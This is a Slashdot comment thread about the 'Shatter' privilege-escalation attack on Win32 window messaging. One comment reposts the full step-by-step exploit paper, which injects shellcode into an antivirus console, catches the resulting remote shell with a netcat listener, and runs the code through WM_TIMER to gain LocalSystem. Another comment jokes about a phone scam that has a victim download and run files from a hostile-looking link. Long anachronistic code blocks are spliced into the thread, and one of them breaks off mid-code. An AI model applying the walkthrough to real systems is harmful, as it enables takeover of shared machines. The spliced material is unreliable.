
Shattering Windows

timothy posted more than 11 years ago | from the fundamentalism dept.

Security 965

ChrisPaget writes: "I've just released a paper documenting and exploiting fundamental flaws in the Win32 API. Essentially, they allow you to take control of any window on your desktop, regardless of whether that window is running as you, localsystem, or anywhere in between. The technique has been discussed before, but AFAIK this is the first working exploit. Oh, did I mention it's unfixable?" You may want to read this CNET interview with Microsoft security head Scott Charney to learn even more about "trustworthy computing."


965 comments

FP (-1, Troll)

Anonymous Coward | more than 11 years ago | (#4020505)

Microsoft Standard First Post 1.0.

Re:FP (-1)

Anonymous Coward | more than 11 years ago | (#4020523)

THIS is INSIGHTFUL? You moderators should be SHOT!

Re:FP (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4020530)

I agree. It was definitely more Informative than Insightful


Fundamental flaws??? (-1)

Anonymous Coward | more than 11 years ago | (#4020517)

What is that bullshit? Fundamental flaws of the Windows API??

*Every* API has flaws.

And Microsoft knows that. This is why they are pushing the new .NET API, which fixes a lot of these flaws.

Jeez (0, Troll)

roguerez (319598) | more than 11 years ago | (#4020521)

That's really OLD. Like >15 years or so. It's not comparable at all to X-Windows where the clients run on a multi-user system.

Isn't this in the EULA anyway? (5, Funny)

Dynamoo (527749) | more than 11 years ago | (#4020529)

"Essentially, they allow you to take control of any window on your desktop".. sounds like it's straight out of Microsoft's new EULAs.

Take control? (0, Flamebait)

Corvaith (538529) | more than 11 years ago | (#4020536)

Does that mean that you could make them all stop crashing? Please?

I'm on reboot #26 today. And this with the supposedly stable Windows XP. Trustworthy computing--I can't even trust it to /run/. I have no illusions about it being secure.

Re:Take control? (4, Insightful)

Moridineas (213502) | more than 11 years ago | (#4020565)

Why on earth is it crashing? Check your event logs. That should NOT be happening--sounds for sure like a hardware failure.

Here's the output from the "systeminfo" command on my work computer fyi:

Original Install Date: 3/15/2002, 11:24:37 AM
System Up Time: 60 Days, 6 Hours, 36 Minutes, 21 Seconds

Re:Take control? (1)

Stonehand (71085) | more than 11 years ago | (#4020636)

How the hell is the parent post "Redundant"? Is a moderator simply so narrow-minded as to want to slap-down any post which posits an explanation why a system might seem incredibly unstable instead of assuming that it's always Microsoft?

And yes, if it's crashing 26 times in a day, the obvious suspects are (a) bad hardware, (b) severe misconfiguration caused by manually editing the registry, mangling system files, et al, (c) worms, trojans and viruses, (d) a VERY badly written OS (and WinXP != DOS or Win9X...).

Re:Take control? (0)

Anonymous Coward | more than 11 years ago | (#4020626)

You must be so full of shit that it's oozing out of your ears. I have been running XP since early beta days and I've only had to reboot due to a crash 1 time, and the core OS didn't actually crash; it was a DirectX game crash and the desktop wouldn't recover. I attribute this to a combination of a bug in the game and a bug in the display drivers, because I have had the game crash since then but with newer drivers and it recovers fine.

Re:Take control? (1, Insightful)

Anonymous Coward | more than 11 years ago | (#4020711)

Wow! If it works for your system then anyone else who it doesn't work for must be a liar!

Jerk. (it crashes for me too)

Re:Take control? (1, Troll)

Tassleman (66753) | more than 11 years ago | (#4020631)

You're either full of shit or have some bad hardware in your box. Alternatively, you could just be incompetent or want to join in on the MS bashing with all the others. Either way, BS.

You must be incompetent. (0)

Anonymous Coward | more than 11 years ago | (#4020685)

I'm sorry, nothing personal here. But 26 reboots? I know serious Linux users here can't take you too seriously but I also know there are some young impressionable minds here.
Here is some advice, kids: when you come across any computer "expert" who has a computer they have to reboot 26 times in a day, run!!!
And here is a real-life experience from someone (me) who makes his living developing on Windows:
I've used Win2k Pro since the day I bought it over 2 years ago. I've rebooted because of a crash or a freeze maybe 10 or 12 times in that time frame. I've had to reinstall the system once. I can say with some confidence that 99% of my reboots are caused by badly designed third party drivers.

Re:Take control? (0)

Anonymous Coward | more than 11 years ago | (#4020700)

I wondered where all my bad luck went today... I've only had to reboot 4 times.

Ummm... 'Kay (4, Insightful)

handorf (29768) | more than 11 years ago | (#4020538)

So basically you're saying that if you can get a user to run arbitrary code and that user has access to applications with higher access rights, you can get those access rights.

If you can get the user to run arbitrary code, they're already dead.

Not to say that windows is secure, but this seems to be picking nits to me.

Re:Ummm... 'Kay (5, Informative)

ptomblin (1378) | more than 11 years ago | (#4020583)

You misunderstand. He's talking about NT/2000/XP, where you have privileged and non-privileged accounts, and where even as a non-privileged account you can have stuff running as the Windows equivalent of "root", and you can use any window that "setuid root" application pops up to root the box yourself.

The example he gave is the anti-virus program that runs with administrator privs (because it has to do stuff to the registry), when you're logged in as Joe User without admin privs. The anti-virus program pops up a window, and bam, you've hijacked the window, given yourself admin privs, made a new administrator login for yourself, and you're away to the races.
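The two facts behind the explanation above can be checked directly. What follows is an added example for this thread, not code from Paget's paper or from any poster. It assumes Windows PowerShell 5.1 or PowerShell 7 on Windows and a Notepad window open on the same desktop; the function names are made up for the example. The first function lists processes that own a top-level window but run as an account other than the interactive user (the targets the thread is talking about). The second shows that SendMessage reaches any window on the desktop without the target's account ever being consulted; WM_SETTEXT is used as a harmless stand-in for the messages the paper relies on.

```powershell
# Added example for this thread; not code from Paget's paper or from any poster.
# Assumes Windows PowerShell 5.1 or PowerShell 7 on Windows, and a Notepad window
# open on the same desktop. Function names here are made up for the example.

Add-Type -Namespace Win32 -Name User32 -MemberDefinition @'
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);

[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr FindWindowEx(IntPtr hwndParent, IntPtr hwndChildAfter, string lpszClass, string lpszWindow);

[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, string lParam);

[DllImport("user32.dll", SetLastError = true)]
public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
'@

$WM_SETTEXT = 0x000C

function Get-WindowOwners {
    # One row per process that owns a top-level window, with the account it runs as.
    # GetOwner fails (User = $null) for processes we cannot open, e.g. SYSTEM when
    # not elevated; those are reported as unknown rather than skipped.
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    Get-Process | Where-Object { $_.MainWindowHandle -ne [IntPtr]::Zero } | ForEach-Object {
        $owner = Get-CimInstance Win32_Process -Filter "ProcessId = $($_.Id)" |
                 Invoke-CimMethod -MethodName GetOwner
        $account = if ($owner.User) { "$($owner.Domain)\$($owner.User)" } else { '(unknown)' }
        [pscustomobject]@{
            ProcessId    = $_.Id
            Process      = $_.ProcessName
            Title        = $_.MainWindowTitle
            RunsAs       = $account
            OtherAccount = ($account -ne $me)   # a window we can reach that is not ours
        }
    }
}

function Send-TextToNotepad {
    param([Parameter(Mandatory)][string]$Text)
    # Locate Notepad's top-level window and its edit control, then push text into
    # it with a window message. Nothing here depends on which account owns Notepad.
    $hwnd = [Win32.User32]::FindWindow('Notepad', $null)
    if ($hwnd -eq [IntPtr]::Zero) { throw 'No Notepad window found on this desktop.' }
    $edit = [Win32.User32]::FindWindowEx($hwnd, [IntPtr]::Zero, 'Edit', $null)
    if ($edit -eq [IntPtr]::Zero) { throw 'No classic Edit control; newer Notepad builds use a different control.' }

    [uint32]$targetPid = 0
    [void][Win32.User32]::GetWindowThreadProcessId($edit, [ref]$targetPid)
    [void][Win32.User32]::SendMessage($edit, $WM_SETTEXT, [IntPtr]::Zero, $Text)
    "WM_SETTEXT delivered to PID $targetPid from PID $PID."
}

Get-WindowOwners | Where-Object OtherAccount | Format-Table -AutoSize
Send-TextToNotepad -Text 'Text placed here by another process via WM_SETTEXT'
```

Run it from a normal PowerShell against a Notepad started the same way and the text lands in the editor: the only thing user32 checked was that both windows live on the same desktop. On the systems this thread is about (NT/2000/XP) that is the whole story, and a service that puts a window on the interactive desktop is reachable in exactly this way. On Vista and later the same call is silently dropped when Notepad was started elevated, because User Interface Privilege Isolation refuses most messages sent to a window of higher integrity, and services no longer share the user's desktop at all (session 0 isolation). Those two changes are how Microsoft eventually addressed what the submission calls unfixable: not by access-checking individual messages, but by keeping privileged windows off the desktop that untrusted code can draw on.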

Re:Ummm... 'Kay (3, Insightful)

handorf (29768) | more than 11 years ago | (#4020662)

Right... a non-privileged user has access to a window running as a more-privileged account.

But the window must be in the user's workspace. You can impersonate the user, or, if the software in question has bugs in it (buffer overruns, etc), you can exploit those.

If the user doesn't have any access to these programs (which they probably shouldn't in a truly secure environment) it isn't an issue. Turn off the user component.

Look at it this way... if you have an X window to a SUID program running and you run arbitrary code... you could well be screwed. This isn't any different.

Still, I'm back to my "If the user runs unknown code, they're screwed". There will always be SOME bugs in ANY operating system which can be exploited if you can get a user to run arbitrary code. Which is why encouraging good user habits is so important.

Re:Ummm... 'Kay (2, Informative)

Anonymous Coward | more than 11 years ago | (#4020724)

"If the user doesn't have any access to these programs (which they probably shouldn't in a truly secure environment) it isn't an issue. Turn off the user component."

You don't understand. The example antivirus program would be running even if the user component was off. If it's running, it can receive messages. If it can receive messages, it can be 'rooted' by the user.

Re:Ummm... 'Kay (1)

silicon_synapse (145470) | more than 11 years ago | (#4020730)

User habits have nothing to do with this. What if it's that user who wants the privilege escalation? If you had read the paper, you'd know this exploit isn't run by simply clicking a button or two. Anyone who does this will know exactly what they're trying to do. No amount of "encouraging good user habits" will stop this unless it involves a cat-o'-nine-tails.

Re:Ummm... 'Kay (3, Insightful)

MisterBlister (539957) | more than 11 years ago | (#4020717)

Yeah, but in any case, software companies could work around this without breaking the Win32 API just by separating out the parts of the code that need special privileges from the user interface code and using a secure message passing system (not based on standard Windows message passing) between the two.

Of course, the fact that apps aren't doing this goes to show that at the very least Microsoft has some education to do when it comes to developing secure 3rd party apps, but its not nearly as earth-shatteringly broken with no hope of being fixed as the paper author lets on.
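The split described in the comment above, as an added example for this thread (not code from the paper or from any poster): the privileged part has no window at all and talks to an unprivileged UI over a named pipe, so there is nothing on the desktop for a window message to hit. Pipe name, command set and function names are made up. It is written for Windows PowerShell 5.1, whose .NET Framework NamedPipeServerStream constructor accepts a PipeSecurity; the pipe ACL decides who may connect before the server reads a byte, the caller's identity is taken from the pipe rather than from the request, and the request itself is matched against a fixed table so no client-supplied string ever reaches a privileged operation.

```powershell
# Added example for this thread; not code from Paget's paper or from any poster.
# Written for Windows PowerShell 5.1 (.NET Framework). Pipe name, command set and
# function names are made up for the example.

$PipeName = 'ExampleAvControl'

# The only things the privileged side will ever do. Requests are matched against
# these keys exactly; no client-supplied text is interpreted or executed.
$Actions = @{
    'status' = { 'engine ok, definitions current' }
    'scan'   = { 'scan queued' }
}

function Start-PrivilegedServer {
    param([int]$Requests = 1)
    # Run this in the privileged context (elevated PowerShell or a service account).
    # Members of Users may connect; Administrators get full control; nobody else
    # gets past CreateFile. The OS enforces this, not our code.
    $sec = New-Object System.IO.Pipes.PipeSecurity
    $sec.AddAccessRule((New-Object System.IO.Pipes.PipeAccessRule('Users', 'ReadWrite', 'Allow')))
    $sec.AddAccessRule((New-Object System.IO.Pipes.PipeAccessRule('Administrators', 'FullControl', 'Allow')))

    for ($i = 0; $i -lt $Requests; $i++) {
        $server = [System.IO.Pipes.NamedPipeServerStream]::new(
            $PipeName, [System.IO.Pipes.PipeDirection]::InOut, 1,
            [System.IO.Pipes.PipeTransmissionMode]::Byte,
            [System.IO.Pipes.PipeOptions]::None, 4096, 4096, $sec)
        try {
            $server.WaitForConnection()
            $reader = New-Object System.IO.StreamReader($server)
            $writer = New-Object System.IO.StreamWriter($server)
            $writer.AutoFlush = $true

            # Caller identity is supplied by the kernel for this pipe instance,
            # not by anything the client wrote into the request.
            $caller  = $server.GetImpersonationUserName()
            $request = $reader.ReadLine()

            if ($request -and $Actions.ContainsKey($request)) {
                $result = & $Actions[$request]
                $writer.WriteLine("OK ${request}: $result (caller $caller)")
            }
            else {
                $writer.WriteLine("DENIED: unknown request from $caller")
            }
            $server.WaitForPipeDrain()
        }
        finally { $server.Dispose() }
    }
}

function Send-UiRequest {
    param([Parameter(Mandatory)][string]$Command)
    # The UI side: runs as the logged-on user, owns the window, holds no privilege.
    $client = [System.IO.Pipes.NamedPipeClientStream]::new('.', $PipeName, [System.IO.Pipes.PipeDirection]::InOut)
    try {
        $client.Connect(5000)
        $writer = New-Object System.IO.StreamWriter($client)
        $writer.AutoFlush = $true
        $reader = New-Object System.IO.StreamReader($client)
        $writer.WriteLine($Command)
        $reader.ReadLine()
    }
    finally { $client.Dispose() }
}
```

To try it, dot-source the file in an elevated PowerShell and run `Start-PrivilegedServer -Requests 2`, then in a non-elevated PowerShell run `Send-UiRequest scan` followed by `Send-UiRequest 'format c:'`. The first is served, the second is refused by name, and at no point does the elevated process own a window that a SendMessage from the user's desktop could reach. The design choice worth noting is that the server never decides anything based on content the client controls beyond a table lookup; if a real backend needed per-user authorization it would impersonate the caller (RunAsClient) and let the OS access check the operation, rather than trusting a user name string.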

EASY! (4, Funny)

mekkab (133181) | more than 11 years ago | (#4020586)

(RING!)

ME) Hello, Mr. Hockenblock?
MR HB) yes?
ME) Our network associates have found a bug in the network system.

MR HB) Oh, really?
ME) Yes, it seems there is a particularly nasty roving virus that when it hits your system through an open port, can cause your computer to get stuck in an n-th complexity infinite binary loop*

*- note blatantly stolen bogus virus description! (see: good times virus warning)

MR HB) Dear lord, no!
ME) anyway, there is a way to fix it.
MR HB) How?!
ME) just go to http://www.eye.0wn.j00.com and download and run the files there.
MR HB) thanks!
ME) please tell all your friends.
MR HB) I will!

Re:Ummm... 'Kay (1)

okigan (534681) | more than 11 years ago | (#4020596)

This is totally true; I wonder why others do not see it.

The system should take care of not allowing the executable to be "executed". After that it should be able to control windows as it needs.

The ability to control windows on the desktop allowed for many nifty features (ex. most plug-ins into MS Dev that need to control a window are done this way).

you're totally missing the point (2, Informative)

jbellis (142590) | more than 11 years ago | (#4020598)

he's not describing a remote attack; in unixspeak, he's describing how a non-root local user can gain root access.

Re:Ummm... 'Kay (1)

billatq (544019) | more than 11 years ago | (#4020623)

I have to disagree-- You're looking at the difference between escalating security rights and actually getting access to the machine. Often there are guest accounts on machines, and if a user can get any of this code to run... they've pretty much gained complete control of it. Of course, this is a problem with the Win32 API itself. Microsoft is going to have fun with this one...

Security from the ground up. (3, Insightful)

scorpioX (96322) | more than 11 years ago | (#4020547)

This just goes to show that security has to be DESIGNED into the very core of any code and not as an afterthought (10 years later in the case of the Win32 API). Taking a month off from new features to implement "Trustworthy Computing" isn't going to fix anything.

Re:Security from the ground up. (3, Interesting)

bokmann (323771) | more than 11 years ago | (#4020694)

The scary thing is the way they will fix it...

"In order to avoid this problem, we are restricting running code to ONLY applications that are signed by Microsoft, or signed by a Microsoft-granted key."

How many open-source projects will run out and get one of these keys?

Overclocked House Needs Extreme Cooling (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4020554)

Owensboro, KY - An enterprising young man has managed to run his appliances faster by overclocking the electrical system in his house. Toast gets done faster, beverages get colder and clothes spin dry at the speed of light, well, almost.

Lance Hatler was irritated with the measly 60 Hz that the electric company fed into his house and decided he could do better. "I thought my overclocked computer system is pretty sweet. Why can't I apply the same principle to my house? I mean besides the fire code," questioned Hatler.

After several trips to the emergency room for massive electric shocks, Hatler's house now runs at a blazing fast 900 MHz. Attempts to run the house even faster caused a bit of structural instability and a few minor fires. "My heart stopped one time, but the thought of shredding two by fours in my garbage disposal got the blood pumping again," Hatler recounted.

Hatler believes that keeping America on a 60 Hz standard is part of a conspiracy by electricity producers. "The electric company is trying to keep us in the dark ages," said Hatler. "They've been stuck at 60 Hz since I was born. Moore's law has to take effect some time, doesn't it? I heard about one guy who made a generator that pumps out electricity at 2 GHz, but the major electric conglomerates bought him out to keep us going slow."

At 900 MHz, the large amount of excess heat generated by this procedure required Hatler to build a giant heat sink and fan combination which he mounted to his roof. It required some structural reinforcement to bear the load, but now Hatler's home remains a constant, cool 115 degrees summer and winter.

Neighbors have complained about the hurricane-like sounds emanating from his property and the local airport has had to reroute traffic around the airspace above Hatler's home as tremendous wind currents and strange thermal patterns have wreaked havoc on navigation, but other than that the procedure has been trouble-free.

Next on the agenda for Hatler is adding water cooling so he can safely break the 1 GHz barrier. "There's always a network of pipes around the house. I just have to add more tubes," said Hatler. "I just wish I could find a place that would sell thermal compound in 55 gallon drums."

Friends don't understand Hatler's obsession with overclocking, but do enjoy some of the benefits. "Microwave popcorn takes like 5 seconds and I've gotten used to the beersicles," said long time friend Greg Denson. "He has an electric water heater so you want to be careful taking a shower so you don't scald your skin off."

At the time of this report Hatler was under investigation by the FAA, Twin Hills Homeowners Association, and the Association to Stop Giant Fan Generated Tornadoes.

Article text in case of /. effect (-1, Redundant)

SoCalChris (573049) | more than 11 years ago | (#4020555)

Exploiting design flaws in the Win32 API for privilege escalation.
Or... Shatter Attacks - How to break Windows.
By Foon - ivegotta@tombom.co.uk

Introduction

This paper presents a new generation of attacks against Microsoft Windows, and possibly other message-based windowing systems. The flaws presented in this paper are, at the time of writing, unfixable. The only reliable solution to these attacks requires functionality that is not present in Windows, as well as efforts on the part of every single Windows software vendor. Microsoft has known about these flaws for some time; when I alerted them to this attack, their response was that they do not class it as a flaw - the email can be found here. This research was sparked by comments made by Microsoft VP Jim Allchin who stated, under oath, that there were flaws in Windows so great that they would threaten national security if the Windows source code were to be disclosed. He mentioned Message Queueing, and immediately regretted it. However, given the quantity of research currently taking place around the world after Mr Allchin's comments, it is about time the white hat community saw what is actually possible. This paper is a step-by-step walkthrough of how to exploit one example of this class of flaw. Several other attack methods are discussed, although examples are not given. There are many ways to exploit these flaws, and many variations on each of the stages presented. This is just one example.

Background - the Win32 messaging system

Applications within Windows are entirely controlled through the use of messages. When a key is pressed, a message is sent to the current active window which states that a key was pressed. When Windows decides that an application needs to redraw its client area, it sends a message to the application. In fact, when any event takes place that an application needs to know about, it is sent a message. These messages are placed into a queue, and are processed in order by the application.

This is a very reliable mechanism for controlling applications. However, on Win32 the mechanism for controlling these messages is flawed. Any application on a given desktop can send a message to any window on the same desktop, regardless of whether or not that window is owned by the sending application, and regardless of whether the target application wants to receive those messages. There is no mechanism for authenticating the source of a message; a message sent from a malicious application is indistinguishable from a message sent by the Windows kernel. It is this lack of authentication that we will be exploiting, taking into consideration that these messages can be used to manipulate windows and the processes that own them.

Overview

In this example, I will be exploiting Network Associates VirusScan v4.5.1, running on Windows 2000 Professional. Since the VirusScan Console runs on my desktop as LocalSystem and I am logged on as a guest user, the objective is to trick VirusScan into running my code to elevate my privileges. This is accomplished in several easy stages.

1. Locate a suitable window within VirusScan (an edit box is perfect), and obtain a window handle to it.
2. Remove any length restrictions that may be present on that edit box, so that I can type in an arbitrary quantity of data.
3. Paste in some binary executable code.
4. Force VirusScan to execute my code (as LocalSystem)

This is actually very easy to do. Windows conveniently provides all of the functionality that we will be needing. I have written a small application called Shatter which implements this functionality. You'll also need a hex editor that is capable of copying binary data to the clipboard (I use UltraEdit), and a debugger (I use WinDbg). Windows messages consist of three parts, a message identifier and two parameters. The parameters are used differently depending on what message is sent. This makes our life simpler, since we only have to worry about four things; a window handle to receive the message, the message, and two parameters. Let's find out how easy this is...

Stage 1: Locating a window

We need to locate an edit control of some kind - something that we can type stuff into. Don't worry if it's restricted, we can cure that. Fire up the VirusScan console, and hit the first button - "New Task". Conveniently, at the top of the dialog, there's an edit box. That will do perfectly. Now, we need a handle to that control so that we can interact with it. Windows is more than happy to give us a handle to any window we like - we just have to ask it. Fire up Shatter, and position it so that you can still see the VirusScan edit control underneath it. Click on "Get cursor window" - Shatter should add an item in the list box beneath like "102f2 - Get cursor window". This is because we've asked Windows to give us a handle to the window directly underneath the cursor. Move the cursor over the VirusScan edit control and hit Space to trigger Shatter again. Shatter should clear the list box, and tell you the handle for the target window - in my case it's 30270. So, we can now interact programmatically with a window that is running with higher privileges than we are. Let's paste in some shellcode.

Stage 2: Removing Restrictions

Now that we have a window handle, we can send any messages we like to that control and it will blindly execute them. First things first - let's make sure we have enough space for our shellcode. Within Shatter, type your window handle into the "Handle" box. The message to set the maximum text length of an edit box is EM_SETLIMITTEXT. The first parameter is the new maximum text length, and the second parameter is ignored. Type 4 into the WPARAM box, and 0 into the third. Click on EM_SETLIMITTEXT to send the message, and try to type something into the VirusScan edit box. You shouldn't be able to type more than 4 characters. Change the 4 to FFFFFFFF and send the message again. Now try typing into the VirusScan edit box; you now have over 4Gb (theoretically) of space within that edit control. Should be enough for even the most wasteful shellcode.

Stage 3: Injecting Shellcode

Next up, let's try pasting something into the box. Yes, OK, you could just right-click and choose Paste, but for the sake of argument let's work as if we couldn't do that. Clear the VirusScan edit box, and fire up Notepad. Type some text into Notepad, and copy it. Back in Shatter, we want to send VirusScan a "Paste clipboard contents" message, which is WM_PASTE. Both parameters for this message should be zero, so set the WPARAM and LPARAM to zero, leaving the handle the same. Click WM_PASTE, and watch your text appear in the VirusScan edit box. Click it again, and it should now be there twice. Fun, huh? OK, that's enough playing. Clear the VirusScan edit box again, and fire up your hex editor. Load up sploit.bin, included in the Shatter zipfile. This is the shellcode taken from Jill (Hey, Dark Spyrit!) which fires a remote command shell back to you. It's hard-coded to send a command shell to the loopback address on port 123, so now's probably a good time to fire up a Netcat listener before you forget. Fire up a cmd, hit "nc -lp 123" and forget it. Back to our hex edit. Copy the shellcode to the clipboard, making sure you get all of it (including the FOON at the beginning - we'll need that in a sec). Back to Shatter, and hit the WM_PASTE button again. You should now see a whole load of nasty-looking characters in the VirusScan edit box; that's our shellcode, nicely pasted in.

Stage 4: Executing the code

This is the only part of the process that requires any skill. Fire up your debugger, and attach it to the avconsol.exe process (Using WinDbg, that's F6 to attach, and just choose the process). Next, do a search through memory for the FOON string. The WinDbg command is s -a 00000001 10000000 "FOON" but you might use a different debugger. Note down the memory location that the string appears at; it'll probably appear a couple of times, don't ask me why. Any of them will do. On my system, the shellcode appears at 0x00148c28, it shouldn't be far off if you're using the same version. Now, kill the debugger, log on as a guest user, and prepare to receive localsystem privs. Follow stages 1 through 3 again, noting that everything still works as a guest user. Don't forget the Netcat listener to receive the shell.

At this point, you might be thinking that attaching a debugger is a privileged operation. It is. However, much the same as when writing a buffer overflow exploit, you can do that part on any system; all you need is the load address which should then work on any system running the same version of the software. In actual fact, you needn't actually do this at all. Most applications have their own exception handlers (VirusScan certainly does), so if they generate an access violation, they just deal with it and move on rather than crashing. So, there's nothing to stop you pasting in a few hundred kilobytes of NOPs and then just iterating through memory until you finally hit the right address and your shellcode executes. Not particularly elegant, but it'll work.

The final message that we're going to make use of is WM_TIMER. This is a slightly odd and very dangerous message, since it can contain (as the second parameter) the address of a timer callback function. If this second parameter is non-zero, execution will jump to the location it specifies. Yes, you read that right; you can send any window a WM_TIMER message with a non-zero second parameter (the first is a timer ID) and execution jumps to that address. As far as I know, the message doesn't even go into the message queue, so the application doesn't even have the chance to ignore it. Silly, silly, silly...

So, within Shatter, the handle should be set to the VirusScan edit control containing our shellcode. The first parameter can be anything you like, and the second parameter should be 512 bytes or so above the address we picked out of the debugger earlier (we have 1K of NOP's in front of the shellcode, so we should land slap bang in the middle of them); on my system that's 0x148c28 + 0x200 = 0x148e28. Hit WM_TIMER, and your netcat listener should come alive with a command prompt. A quick WHOAMI will reveal that you have indeed gone from guest to local system. Enjoy.

Alternative techniques

There's a few other ways of doing what we just managed, utilising the same basic mechanisms but maybe adding a bit more complexity. The EM_GETLINE message tells an edit control to copy its contents to a location specified within the message. How would you like to write arbitrary quantities of data to arbitrary locations in memory? How easy a sploit do you want? We've seen how the restrictions can be removed from the length of an edit control; what happens when an application depends on these restrictions? When an application expects 16 bytes of data from a limited-to-16-byte edit box, we can type in a few gigs. Everyone, on three; 1....2....3....Buffer Overflow! Probably stack-based too, since 16 bytes of data is unlikely to come from the heap. Also, when we send WM_TIMER, the parameter we specify as a timer ID gets pushed onto the stack along with a whole load of other crap. It's not inconceivable that we could find a function which makes use of the 3rd function parameter and none of the others, allowing us to jump directly to a sploit with a single message.

Talking of the heap, that's another great thing about these exploits. Generally, applications will create dialog boxes on the heap well in advance of any major memory operations taking place; our shellcode address is going to remain pretty static. In my experience it rarely moves more than 20 bytes between instances. Static jump addresses shouldn't be a problem, but who cares? Send the app an EM_GETLINE message so it writes your shellcode to a location you specify (Hell, overwrite the heap. Who's gonna care?) and then specify the same address in your WM_TIMER message. A completely NOP-free sploit! What fun!

Fixing the problem

Okay, so this is pretty easy to exploit. How is everyone gonna fix this? I can see two quick and dirty methods which will break a whole lotta functionality, and one very long-winded solution which is never going to be a total solution. Let me explain.

1. Don't allow people to enumerate windows
Nasty. Multiple breakages. Theoretically possible, but I'd hate to see people trying to work around not knowing what windows are on the desktop when they need to.

2. Don't allow messages to pass between applications with different privileges
Means that you couldn't interact with any window on your desktop that's not running as you; means that VirusScan at the very least (probably most personal firewalls, too) would need a whole lotta redesigning.

3. Add source info to messages, and depend on applications to decide whether or not to process the messages
Would need an extension to the Win32 API, and a whole lotta work for people to use it. Big job, and people would still get it wrong. Look at buffer overflows - they've been around for years, and they're still fairly common.

Basically, there is no simple solution, which is why Microsoft have been keeping this under their hat. Problem is, if I can find this, I can guarantee that other people have as well. They might not tell anyone about it, and the next time they get into your system as a low-priv user, you wouldn't have a clue how they got LocalSystem out of it. After all, you're all up to date on patches, aren't you?

Addendum: Why is this a problem?

When Microsoft saw a copy of this paper, they sent me a response stating clearly that they are aware of these attacks, and they do not class them as vulnerabilities. I believe that this point of view is incorrect. The two reasons that Microsoft stated are that a) They require unrestricted physical access to your computer, or b) they require you to run some kind of malicious code on your machine. I agree completely that in both of these scenarios, 0wning the machine is pretty easy. However, they've missed the point. These are techniques that an attacker can use to escalate their privileges. If they can get guest-level access to a machine, these attacks allow you to get localsystem privileges from any user account. Anyone ever heard of a little tool called hk.exe? How about ERunAsX (AKA DebPloit)? How about iishack.dll? All of these tools exploit some flaw that allows you to escalate your privileges AFTER you've gained access to the machine. All of these have been recognised as security holes by Microsoft, and patched.

If you have a corporate desktop machine, most commonly those machines will be quite tightly locked down. The user on that machine cannot do very much that they have not been explicitly granted permission to do. If that machine is vulnerable to a shatter attack, that user can gain localsystem privileges and do what they like. Even worse is the case of Terminal Services (or Citrix). Imagine a company providing terminal service functionality to their clients, for whatever purpose. That company is NOT going to give their users any real privileges. Shatter attacks will allow those users to completely take over that server; localsystem privileges are higher than the Administrator, and on a shared server that's a problem. Oh, and it doesn't require console access either - I've successfully executed these attacks against a Terminal Server a hundred miles away.

The simple fact is that Microsoft KNOW that they cannot fix these flaws. The mechanism used is the Win32 API, which has been fairly static since Windows NT 3.5 was released in July 1993. Microsoft cannot change it. The only way they could stop these attacks is to prevent applications from running on the desktop with privileges higher than those of the user logged on. Microsoft believe that the desktop is a security boundary, and that any window on it should be classed as untrusted. This is true, but only for Windows, and because of these flaws. Either way, Microsoft break their own rules; there's numerous windows on a standard desktop that run as localsystem. Use my shatter tool to verify this - there's a whole load of unnamed windows which might be running as Localsystem, and a few invisible windows (like the DDE server) that definitely are. Security boundary my arse.

Is this just a Win32 problem?

Probably, yes. The only mainstream competitor to Windows in terms of windowing systems is X windows. X is based on a similar underlying technique, that of queueing messages that are passed between windows. X, however, has two major differences. Firstly, a window in X is just a window - it's a blank page on which the application can do what it likes. Unlike Win32 where each control is a window in its own right, a control in X is just a picture. When you click that control, you're actually clicking the window surrounding it, and the application is responsible for figuring out whether or not there's actually a control underneath your mouse and responding accordingly. Secondly, and more importantly, X messages are just notifications, not control messages. You can't tell an X window to do something just by sending it a message. You can't tell it to paste text. You can't tell it to change the input limits on a control. You certainly can't tell it to jump to a location in memory and start executing it. The best you can do is send it the mouse clicks or keyboard strokes that correspond to a paste command - you certainly can't tell a control to paste in the contents of the clipboard. As such, it's still theoretically possible for some of these attacks to work against X but in practice it's highly unlikely. You could flood an application with fake messages and see how it responds; you could send it corrupt messages and see how it responds. Chances are, it would cope just fine, since it'll choose what to do with the messages and process the flood one at a time.

Anyway kids, have fun, play nicely, be good. And remember - if it ain't broke, hit it again.
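The receiving side of the mechanism the pasted paper describes, as a portable C model added here (not code from the paper, the Shatter tool, or any vendor): a window procedure that obeys EM_SETLIMITTEXT, WM_PASTE and WM_TIMER exactly as described sits beside one that validates them, the WM_TIMER check being the one Windows later shipped. The message numbers are the Win32 values; the struct layout, function names and the clipboard stand-in are assumptions made for this model.

```c
/* Portable C model of a window procedure, added as an example; not code from the
 * paper, from Shatter or from any vendor. naive_wndproc obeys the three messages
 * exactly as the post describes; hardened_wndproc validates them. Message numbers
 * are the Win32 values; everything else is an assumption made for this model. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define WM_TIMER        0x0113
#define WM_PASTE        0x0302
#define EM_SETLIMITTEXT 0x00C5
#define MAX_TIMERS      4
#define APP_MAX_INPUT   16   /* the input length the application is written for */
typedef void (*timer_cb_t)(unsigned id);

struct window {
    struct { unsigned id; timer_cb_t cb; } timers[MAX_TIMERS];  /* set by the app itself */
    size_t   ntimers;
    size_t   limit;      /* edit-control limit; any process on the desktop can resend it */
    char     text[64];   /* oversized so the naive path stays memory-safe in this model */
    unsigned dropped;    /* messages the hardened handler refused */
};
typedef int (*wndproc_t)(struct window *, unsigned, uintptr_t, intptr_t);

static const char *g_clipboard = "";   /* constructed stand-in for the clipboard */
/* Only the application registers timers, so this table is the trustworthy record
 * of which callback belongs to which timer id. */
static timer_cb_t registered_cb(const struct window *w, unsigned id)
{
    for (size_t i = 0; i < w->ntimers; i++)
        if (w->timers[i].id == id) return w->timers[i].cb;
    return NULL;
}

static void do_paste(struct window *w, size_t bound)
{
    size_t n = strlen(g_clipboard), cap = sizeof w->text - 1;
    n = n < bound ? n : bound; n = n < cap ? n : cap;
    memcpy(w->text, g_clipboard, n); w->text[n] = '\0';
}

/* Vulnerable pattern: a non-zero WM_TIMER lParam is called as a function, and
 * the paste is bounded only by a limit that any sender may have raised. */
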